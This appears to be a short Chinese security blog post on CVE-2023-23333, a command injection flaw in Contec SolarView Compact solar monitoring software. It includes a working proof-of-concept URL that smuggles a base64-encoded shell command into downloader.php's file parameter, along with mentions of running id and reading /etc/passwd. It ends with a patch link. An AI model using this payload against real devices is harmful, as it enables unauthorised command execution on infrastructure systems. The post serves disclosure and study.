
漏洞速递 | CVE-2023-23333 RCE漏洞(附EXP)
0x00写在前面
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
0x01漏洞介绍
Contec SolarView Compact是日本Contec公司的一个应用系统。提供光伏发电测量系统。
Contec SolarView Compact 6.00版本及之前版本存在安全漏洞。攻击者利用该漏洞通过downloader.php绕过内部限制来执行命令。
0x02影响版本
Contec SolarView Compact 6.00版本及之前版本存在安全漏洞
0x03漏洞复现
1.访问漏洞环境
2.对漏洞进行复现
Poc
/downloader.php?file=;echo%20aWQ=|base64%20-d|bash%00.zip
注意:%00
复现
执行id命令
执行cat /etc/passwd命令
0x04修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://www.solar-frontier.com/jpn/residential/products/pdf/discontinued/SolarViewCompact.pdf
评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果